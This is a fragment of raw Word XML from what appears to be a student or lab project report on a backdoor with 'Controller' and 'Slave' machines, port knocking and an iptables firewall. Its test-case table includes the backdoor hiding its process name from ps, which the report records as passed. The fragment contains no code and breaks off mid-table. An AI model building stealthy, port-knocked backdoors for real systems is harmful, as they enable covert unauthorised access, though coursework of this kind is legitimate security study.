      <w:bookmarkStart w:id="36" w:name="h.oodsbasko79c" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="37" w:name="_Toc405739269"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r>
        <w:t>Names &amp; Aliases</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>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C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>IP Addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Send / Receive Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Alias</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>192.168.0.21, 192.168.0.16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>10022</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>192.168.0.22, 192.168.0.17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>10022</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Slave</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="h.n9jnh1temyck" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="39" w:name="_Toc405739270"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r>
        <w:t>Test Cases</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>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2905"/>
        <w:gridCol w:w="1550"/>
        <w:gridCol w:w="2835"/>
        <w:gridCol w:w="1290"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C60197" w:rsidTr="00634A4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Case #</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1550" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Tools Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Expected Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Results</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2905" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Programs do not have any memory leaks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Valgrind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>No memory leaks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2905" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Programs are not intensive for machines to run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>htop</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>There are no significant slowdowns; they do not exhaust any CPU processing power</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FAILED. See results for explanation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2905" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Basic firewall implementations on Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>iptables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>All external packets are dropped, except for those on port knocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2905" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Backdoor can mask its process name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> aux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The Backdoor application’s name is not Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See Appendices for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>II</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2905" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Packet has the proper information configured in its headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Wireshark shows that the packet has the proper destination IP and destination Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00634A4B" w:rsidRDefault="00634A4B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>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2905"/>
        <w:gridCol w:w="1550"/>
        <w:gridCol w:w="2835"/>
        <w:gridCol w:w="1290"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C60197" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
